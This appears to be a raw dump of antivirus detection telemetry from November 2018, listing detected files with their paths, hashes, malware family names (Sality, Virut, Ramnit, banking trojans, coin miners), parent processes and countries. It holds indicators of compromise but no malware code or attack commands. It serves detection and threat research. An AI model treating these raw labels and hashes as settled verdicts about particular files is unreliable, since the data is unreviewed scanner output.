  Row(detection=Row(filename='avirasecuritycenteragent.exe', filepath='c:\\program files (x86)\\avira\\antivirus\\avirasecuritycenteragent.exe', filesize=840000, name='W32/Sality.Patched.#M1.#R1'), hash='4d3390f1bd3f6b3986e670c2eabfea2e528541ac16d0a33f07254858aaf4e781', metadata=Row(cmdline='\\/LOGFILE=\\"C:\\\\ProgramData\\\\Avira\\\\Antivirus\\\\LOGFILES\\\\AviraSecurityCenterAgent-2018-10-27-21-48-58.log\\" \\/LOGLEVEL=\\"STANDARD\\" \\/UPDATE_WSC=\\"ENABLE\\" \\/VDFDATE=\\"2018-10-20T00:00:00\\" \\/TRIGGER=\\"gpschd.dll Cyclic Check\\"', country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Avira\\Antivirus\\sched.exe', parentsize=248312, timestamp='2018-11-01T07:02:34Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-151900-0bcff717', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_c591ee81\\AVSCAN-20181101-151418-E472E91D\\AVSCAN-20181101-151900-0BCFF717', filesize=1536000, name='TR/Crypt.XPACK.Gen.#M1.#R1'), hash='4fe2744e570d5be6bfc798d8f45f02a7f5414a9f0328369ee7be5e7d675ff232', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T09:37:50Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='38320505ee418154e6c7e12ff537cb234a6f770835ba32ba557a856b3091212b.vir', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries_27.10.2018-19.available\\Avira\\38320505EE418154E6C7E12FF537CB234A6F770835BA32BA557A856B3091212B.VIR', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='38320505ee418154e6c7e12ff537cb234a6f770835ba32ba557a856b3091212b', metadata=Row(cmdline='\\\\\\"D:\\\\\\\\TotalAutomation\\\\\\\\Avira1.4.py\\\\\\" ', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Python27\\python.exe', parentsize=26624, timestamp='2018-11-01T09:44:43Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='maintenancesservices.dll', filepath='C:\\Windows\\System32\\MaintenancesServices.dll', filesize=576000, name='TR/Vools.mlupg.#M1.#R1'), hash='13ab3d572b30a77009d8d417be0cce6774b7590a302ac0e6f9843e1ba693a243', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\lsass.exe', parentsize=None, timestamp='2018-11-01T01:08:28Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='transcodedwallpaper.jpg', filepath='C:\\Users\\X\\AppData\\Roaming\\Microsoft\\Windows\\Themes\\TranscodedWallpaper.jpg', filesize=3456000, name='EXP/MS04-028.JPEG.A.#M1.#R1'), hash='4b525aaa4ae479f3c4bdabc51ca3b966be9d881f74cc7f3e840b73e413ccef6d', metadata=Row(cmdline=None, country='BE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=3229696, timestamp='2018-11-01T16:57:21Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='installer.exe', filepath='C:\\Users\\X\\Downloads\\installer.exe', filesize=512000, name='ADWARE/DealPly.Gen8.#M300.#R700907'), hash='00eb83e0c976d7e8269c5e42ea02793dc98a4d07755dfe27a3c21c0a584418b8', metadata=Row(cmdline='--engine=2 --session-id=1xaDbvHliwtrTc\\\\\\/MBVUtLUDo2CahmBIL9A7A2s4l --registry-suffix=ESET', country='FR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Users\\X\\AppData\\Local\\Google\\Chrome\\User Data\\SwReporter\\32.169.200\\software_reporter_tool.exe', parentsize=13796472, timestamp='2018-11-01T16:16:15Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='searchprotocolhost.exe', filepath='C:\\Windows\\System32\\SearchProtocolHost.exe', filesize=192000, name='W32/Virut.Gen.#M1.#R1'), hash='67d41aa654a042c9fdba9127538c263e8e153fcd2347c815a690dd30db380bda', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchIndexer.exe', parentsize=427520, timestamp='2018-11-01T08:49:33Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181031-232456-4003aa3b', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_e4552d08\\AVSCAN-20181031-231129-DDA39FCC\\AVSCAN-20181031-232456-4003AA3B', filesize=1152000, name='Adware/Zdengo.fru.#M1.#R1'), hash='ea813cd4129df283f7ae7bc890fd650fc1d876e20be0e460aba3eac62a93efc0', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T02:25:01Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='meizhenlin second.html', filepath='C:\\Users\\X\\Desktop\\RESTORED\\2018-11-01_13-10-48\\MEIZHENLIN SECOND.html', filesize=248000, name='VBS/Ramnit.abcd.#M1.#R1'), hash='b084d22d1ad3097436e543a917441dd92c37d1a6eae21fab7a4a995af0032a80', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=3229696, timestamp='2018-11-01T06:19:02Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-104453-fa3fcd61', filepath='C:\\Documents and Settings\\X\\Application Data\\Avira\\Antivirus\\TEMP\\AVSCAN-20181101-104406-AAF951B0\\AVSCAN-20181101-104453-FA3FCD61', filesize=1536000, name='TR/Crypt.XPACK.Gen.#M1.#R1'), hash='5f28ee2b6f85211912fd7283bc72088a22b75457293cfa31a4b3428ac82f35a4', metadata=Row(cmdline=None, country='TN', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T09:43:23Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='w_cproc_p_11.1.048_redist_intel64.exe', filepath='D:\\PLAQUINHAS DIVERTIDAS\\PROGRAMAS\\COREL X8\\CorelDraw Graphics Suite X8 Multilanguage 32 e 64 Bits\\CorelDRAW X8 32 e 64\\x64\\MSIs\\w_cproc_p_11.1.048_redist_intel64.exe', filesize=512000, name='W32/Stanit.#M1.#R1'), hash='debe1faa480cfe3729607fcfd0648df36b4a96ae658dc0865a0b7b0beac73db7', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T05:05:19Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='autmgr32.exe', filepath='D:\\Test_server_backup\\Public\\visual_studio_6.0Disk1\\VFP98\\DISTRIB.SRC\\SYSTEM\\AUTMGR32.EXE', filesize=192000, name='W32/Alman.BB.#M1.#R1'), hash='ba1c1ec10f7445b80823c5e7eda2842be32aa364630bc4aa3495259d5b04f012', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T06:27:37Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-141345-f3ad6d81', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_103c7217\\AVSCAN-20181101-141146-DA744C4C\\AVSCAN-20181101-141345-F3AD6D81', filesize=376000, name='PUA/MyWebSearch.ME.1.#M300.#R6777'), hash='a36c690c41d2651fe6a2e5f9d785ac213521e3b62107bb5a7b6b4ee4372a5b75', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-01T13:13:46Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='gspideypc.exe', filepath='F:\\اغاني\\العاب\\games\\الرجل العنكبوت\\gSpideyPC.exe', filesize=1536000, name='W32/Virut.Gen.#M1.#R1'), hash='9af631417530593a30073bc64a4dda6e2e3e310a92bd98fb948f398837a69e8c', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\SuperCopier2\\SuperCopier2.exe', parentsize=955392, timestamp='2018-11-01T18:23:12Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='transcodedwallpaper.jpg', filepath='C:\\Users\\X\\AppData\\Roaming\\Microsoft\\Windows\\Themes\\TranscodedWallpaper.jpg', filesize=3456000, name='EXP/MS04-028.JPEG.A.#M1.#R1'), hash='e2cc77fe784a1938d94d20e009d0e50fcf72062936411bc69e829045ee7f6d8b', metadata=Row(cmdline=None, country='IR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=3229696, timestamp='2018-11-01T23:30:04Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-110057-aed76699', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_6d9d8225\\AVSCAN-20181101-105540-86DD2301\\AVSCAN-20181101-110057-AED76699', filesize=704000, name='Worm/IRCBot.ms.70.#M1.#R1'), hash='ceb41711d9656413e2e7523f1b9c2cf61cd9368c110cea44bc9314cc1e7075b0', metadata=Row(cmdline=None, country='MX', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-01T17:00:43Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-124728-a69fdf40', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181101-124708-956FA8D1\\AVSCAN-20181101-124728-A69FDF40', filesize=20000, name='PUA/Linkury.Gen2.#M300.#R101296'), hash='9d728e799087184abed77f070f3fdee4fd9fae622bf93bcfa4744be9dfaf89e9', metadata=Row(cmdline=None, country='ES', os_name='Windows', os_vmajor='6', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T11:47:28Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='cool_music.exe', filepath='G:\\Cool_Music.exe', filesize=1600000, name='TR/Patched.Ren.Gen4.#M300.#R300179'), hash='e9238eb4cc2a0e45a4ecca77c7477cc3a19b6954cc0ca545537f1325ece125fc', metadata=Row(cmdline=None, country='CI', os_name='Windows', os_vmajor='6', os_vminor='2', parentproc='C:\\Windows\\explorer.exe', parentsize=2106176, timestamp='2018-11-01T11:49:35Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='atube_catcher_0419923594.exe', filepath='\\\\?\\C:\\Users\\X\\Downloads\\aTube_Catcher_0419923594.exe', filesize=2460000, name='PUA/InstallCore.#M1.#R1'), hash='62baa352039830f5fd30eb37497b849a646d678db29466333ac2a0c43fdda658', metadata=Row(cmdline=None, country='ES', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T10:39:51Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='caption.htm', filepath='C:\\Users\\This\\AppData\\Local\\VirtualStore\\Program Files (x86)\\Adobe\\Photoshop 7.0\\Presets\\WebContactSheet\\Horizontal Light\\Caption.htm', filesize=216000, name='VBS/Ramnit.abcd.#M0.#R0'), hash='6e2417ab0ccf910099220898fc5a92f4333b47b10c344eca9e3d2006608a58e3', metadata=Row(cmdline=None, country=None, os_name='Windows', os_vmajor='7', os_vminor=None, parentproc=None, parentsize=None, timestamp='2018-11-01T12:57:34Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-110507-ce4dac66', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_6d9d8225\\AVSCAN-20181101-105540-86DD2301\\AVSCAN-20181101-110507-CE4DAC66', filesize=704000, name='Worm/IRCBot.ms.70.#M1.#R1'), hash='ceb41711d9656413e2e7523f1b9c2cf61cd9368c110cea44bc9314cc1e7075b0', metadata=Row(cmdline=None, country='MX', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-01T17:04:52Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='e_farngei.exe', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\{3B9E88D2-9758-44D3-86CB-1997B79D85E1}\\E_FARNGEI.EXE', filesize=256000, name='W32/Alman.BB.#M1.#R1'), hash='a8d58f2a6c822eadd2715f83e09e05d71089d5ead0db30dccf9937eed917c537', metadata=Row(cmdline='aepdu.dll,AePduRunUpdate', country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\rundll32.exe', parentsize=44544, timestamp='2018-11-01T00:59:38Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='faixa 12 lançamento 2015 -=mp3=- - copy (12).exe', filepath='C:\\Users\\X\\Documents\\Baixar,_Escutar_CD_Sorriso_Maroto_-_Eu_Gosto,_Ao_Vivo_No_Maracanãzinho_-_(2015)[1]\\Baixar, Escutar CD Sorriso Maroto - Eu Gosto, Ao Vivo No Maracanãzinho - (2015)\\FAIXA 12 Lançamento 2015 -=Mp3=- - Copy (12).exe', filesize=4800000, name='TR/Spy.Banker.Gen.#M300.#R2024'), hash='6a10f4e287d21dd6ef83dd4c4fe2a109922634b96f93274f2c2bdbcbd68ebea7', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\explorer.exe', parentsize=2755504, timestamp='2018-11-01T03:19:45Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='thcs.exe', filepath='\\\\?\\C:\\Program Files (x86)\\THCS\\THCS.exe', filesize=704000, name='HEUR/APC.#M1.#R1'), hash='76e9768b805909feb2ce7f997821c61190ed3311553fdbb0843abe6efd11c893', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T00:24:01Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='msinfo32.exe', filepath='\\\\?\\C:\\Windows\\system32\\msinfo32.exe', filesize=320000, name='W32/Virut.Gen.#M1.#R1'), hash='d8213db326927daea127aab9eca9553efdc173c1a3137c132564ec7ac71ec05b', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T11:20:16Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-111413-1321d164', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_6d9d8225\\AVSCAN-20181101-105540-86DD2301\\AVSCAN-20181101-111413-1321D164', filesize=704000, name='Worm/IRCBot.ms.70.#M1.#R1'), hash='ceb41711d9656413e2e7523f1b9c2cf61cd9368c110cea44bc9314cc1e7075b0', metadata=Row(cmdline=None, country='MX', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-01T17:13:58Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='service.exe', filepath='C:\\Applications\\Service.exe', filesize=14208000, name='HEUR/AGEN.1011898.#M1.#R1'), hash='5931493c4c1b03b23fbf74fceab77280aac7a0a483e0fb86c9db29216ba97f1e', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2972672, timestamp='2018-11-01T21:23:58Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='mcecf21.exe', filepath='C:\\NOVA PASTA\\PVECF21\\BKPROG\\MCECF21.exe', filesize=13312000, name='W32/Sality.AT.#M1.#R1'), hash='cf106efc210b072d845b628018b40e1d82a58681b2bfed3dcf933471f26501e4', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T09:39:24Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='js.scr', filepath='F:\\New folder\\[IBRASoftware.com] CorelDrawX8 (x64)\\Lang\\pl\\Custom\\js\\js.scr', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='578d39ad2094181562e84cc0f0ef7a99aef1f27a5e537651d45dee406006b474', metadata=Row(cmdline='rtp', country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\SMADAV\\SMΔRTP.exe', parentsize=1613824, timestamp='2018-11-01T17:17:11Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='battle_realms_f.exe', filepath='d:\\pc games\\battle realms complete\\Battle_Realms_F.exe', filesize=3072000, name='W32/Sality.AT.#M1.#R1'), hash='557e5d1c4edff17bfa4e3213ef8dcadd89eaf53260b5fa5e9f95d2299e38a86d', metadata=Row(cmdline=None, country='PH', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T09:12:55Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='wap.exe', filepath='c:\\program files (x86)\\prokaward\\wap.exe', filesize=4096000, name='SPR/Tool.AwardKeylogger.93.#M1.#R1'), hash='6b0c812488381b7c768741c139ab6bbca0ac260d6775cd552e354bf93925224f', metadata=Row(cmdline=None, country='US', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\ProKAward\\rsasws.exe', parentsize=98304, timestamp='2018-11-01T08:47:59Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-01T01:08:11Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-01T10:12:34Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-180249-19905d92', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_6b2d1e1a\\AVSCAN-20181101-180219-075EB892\\AVSCAN-20181101-180249-19905D92', filesize=4736000, name='HEUR/APC.#M1.#R1'), hash='4836fc0c6e1cc6e085550b43cb0a166129544aff6f11100aa0de83467149530b', metadata=Row(cmdline=None, country='FR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T17:03:49Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='429429469fa40c406470e96c0ad70e669627748c50d4b44ec0be33fb0f961690', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-34\\429429469FA40C406470E96C0AD70E669627748C50D4B44EC0BE33FB0F961690', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='429429469fa40c406470e96c0ad70e669627748c50d4b44ec0be33fb0f961690', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T15:51:22Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-201918-94829e4b', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_4b7b5b83\\AVSCAN-20181101-201802-8C2A3CA9\\AVSCAN-20181101-201918-94829E4B', filesize=4736000, name='HEUR/APC.#M1.#R1'), hash='4836fc0c6e1cc6e085550b43cb0a166129544aff6f11100aa0de83467149530b', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T19:19:09Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181102-005510-21fb47b6', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_83a270a8\\AVSCAN-20181101-234829-DD2407AD\\AVSCAN-20181102-005510-21FB47B6', filesize=1536000, name='TR/CoinMiner.CK.#M1.#R1'), hash='39cee19d7a3a27e18697f46c37fdd5277c4b22524aa0784de20a211cac399800', metadata=Row(cmdline=None, country='TR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T21:55:10Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='msimg32.dll', filepath='C:\\Users\\X\\Downloads\\Setup\\msimg32.dll', filesize=4736000, name='HEUR/APC.#M1.#R1'), hash='4836fc0c6e1cc6e085550b43cb0a166129544aff6f11100aa0de83467149530b', metadata=Row(cmdline=None, country='AT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Users\\X\\Downloads\\Setup\\Setup.exe', parentsize=1551000, timestamp='2018-11-01T17:39:29Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='wrapper32.exe', filepath='c:\\users\\X\\ostiumclients\\guard\\wrapper32.exe', filesize=192000, name='HEUR/APC.#M1.#R1'), hash='4e0cfcd6a5358c4465ddc79d70cd314859633ad974fbeac04f8c4cbcaf7b39ee', metadata=Row(cmdline='-XX:HeapDumpPath=ThisTricksIntelDriversF...indows 10\\" -Dos.version=10.0 -Davn32=C:\\\\Users\\\\User\\\\ostiumclients\\\\guard\\\\Avanguard32.dll -Davn64=C:\\\\Users\\\\User\\\\ostiumclients\\\\guard\\\\Avanguard64.dll -Dfml.ignorePatchDiscrep...leAttachMechanism -Djava.library.path=C:\\\\Users\\\\User\\\\ostiumclients\\\\updates\\\\MagicTechLite\\\\...\\\\ostiumclients\\\\updates\\\\MagicTechLite\\\\libraries\\\\com\\\\paulscode\\\\codecwav\\\\20101023\\\\codecwav-20101023.jar;C:\\\\Users\\\\User\\\\ostiumclients\\\\updates\\\\MagicTechLite\\\\libraries\\\\com', country='RU', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files (x86)\\Java\\jre1.8.0_191\\bin\\java.exe', parentsize=192376, timestamp='2018-11-01T18:23:10Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='mysqlimport.exe', filepath='C:\\Program Files (x86)\\Common Files\\Adobe\\Adobe Version Cue CS4\\Server\\database-template\\bin\\x86\\mysqlimport.exe', filesize=1536000, name='W32/Sality.AT.#M1.#R1'), hash='0652e2e8370571321214c4aefe78114a203dd646e79e2ec035ffe970e18673d8', metadata=Row(cmdline='-m:appraiser.dll -f:DoScheduledTelemetryRun -cv:bworamm2EEOVuB+M.1', country='TR', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\System32\\CompatTelRunner.exe', parentsize=None, timestamp='2018-11-01T18:08:57Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='mynsisextend.dll', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\nst52F.tmp\\MyNsisExtend.dll', filesize=1024000, name='ADWARE/Adware.Gen7.#M300.#R603137'), hash='48d0191d0dd40ea4e9d0197017cf9cae8a1630162a38392829005adc050e5fad', metadata=Row(cmdline=None, country='CN', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Users\\X\\Desktop\\caijing1945.exe', parentsize=29272307, timestamp='2018-11-01T16:45:55Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-211302-7deace66', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_875d076b\\AVSCAN-20181101-211214-760596BA\\AVSCAN-20181101-211302-7DEACE66', filesize=4736000, name='HEUR/APC.#M1.#R1'), hash='4836fc0c6e1cc6e085550b43cb0a166129544aff6f11100aa0de83467149530b', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T20:13:06Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='$rom7623.apk', filepath='\\\\?\\D:\\$RECYCLE.BIN\\S-1-5-21-2383550910-1594690086-4045582420-500\\$ROM7623.apk', filesize=11792000, name='Adware/ANDR.CyFin.B.Gen.#M1.#R1'), hash='171d70b16abbbb05cd6cfaff382fe316cde982a2a938ad079464404cf382f449', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T12:15:45Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='mshsrvq.exe', filepath='\\\\?\\C:\\ProgramData\\mshsrvq.exe', filesize=96032000, name='WORM/Lodbak.Gen.#M300.#R7829'), hash='3a6bee6ddc35257b256c8896c1c5ef0088a02f24d536eb9da2fc1fde439f13b7', metadata=Row(cmdline=None, country='IR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T06:48:10Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='3f97a789ca629211e3ba82f4cb5533dbe8f4543423455308cad1a9441c6d74e0.vir', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries_27.10.2018-16.available\\Avira\\3F97A789CA629211E3BA82F4CB5533DBE8F4543423455308CAD1A9441C6D74E0.VIR', filesize=512000, name='TR/Spy.Viking.Gen.#M300.#R1100'), hash='3f97a789ca629211e3ba82f4cb5533dbe8f4543423455308cad1a9441c6d74e0', metadata=Row(cmdline='\\\\\\"D:\\\\\\\\TotalAutomation\\\\\\\\Avira1.4.py\\\\\\" ', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Python27\\python.exe', parentsize=26624, timestamp='2018-11-01T08:55:55Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='ioc457e291f-974c-884f-be82-5b01fb52960d.exe', filepath='C:\\ProgramData\\Kaspersky Lab\\AVP18.0.0\\Temp\\ioc457E291F-974C-884F-BE82-5B01FB52960D.exe', filesize=16416000, name='TR/Patched.Ren.Gen.#M300.#R4405'), hash='153672a8a39883d8fb5baf76454c9145ca648f8b6f3b8d32afe39dd96807095d', metadata=Row(cmdline=None, country='TR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\AVAST Software\\Avast\\AvastSvc.exe', parentsize=325024, timestamp='2018-11-01T00:11:37Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='msimg32.dll', filepath='C:\\Users\\X\\Downloads\\Setup\\msimg32.dll', filesize=4736000, name='HEUR/APC.#M1.#R1'), hash='4836fc0c6e1cc6e085550b43cb0a166129544aff6f11100aa0de83467149530b', metadata=Row(cmdline=None, country='IT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Users\\X\\Downloads\\Setup\\Setup.exe', parentsize=1551000, timestamp='2018-11-01T22:10:38Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='travail n°3 bilterys.exe', filepath='D:\\TRAVAIL N°3 bilterys.exe', filesize=1600000, name='TR/Patched.Ren.Gen4.#M300.#R300179'), hash='388a734e1ec41559c2578c82242cd984b2559f81e04811552762fa1d5a4a18ed', metadata=Row(cmdline=None, country='BF', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T11:32:56Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-01T20:15:55Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-231237-9dacbfcb', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_22556673\\AVSCAN-20181101-231202-9966164C\\AVSCAN-20181101-231237-9DACBFCB', filesize=4736000, name='HEUR/APC.#M1.#R1'), hash='4836fc0c6e1cc6e085550b43cb0a166129544aff6f11100aa0de83467149530b', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T16:12:40Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='transcodedwallpaper', filepath='C:\\Users\\X\\AppData\\Roaming\\Microsoft\\Windows\\Themes\\TranscodedWallpaper', filesize=6912000, name='EXP/MS04-028.JPEG.A.#M1.#R1'), hash='8605250801f13c10538a35dd8909965043b6aeb907d1870f0f7324bab3f44db2', metadata=Row(cmdline=None, country='FR', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\explorer.exe', parentsize=2755504, timestamp='2018-11-01T18:46:30Z'), dt=datetime.date(2018, 11, 1)),
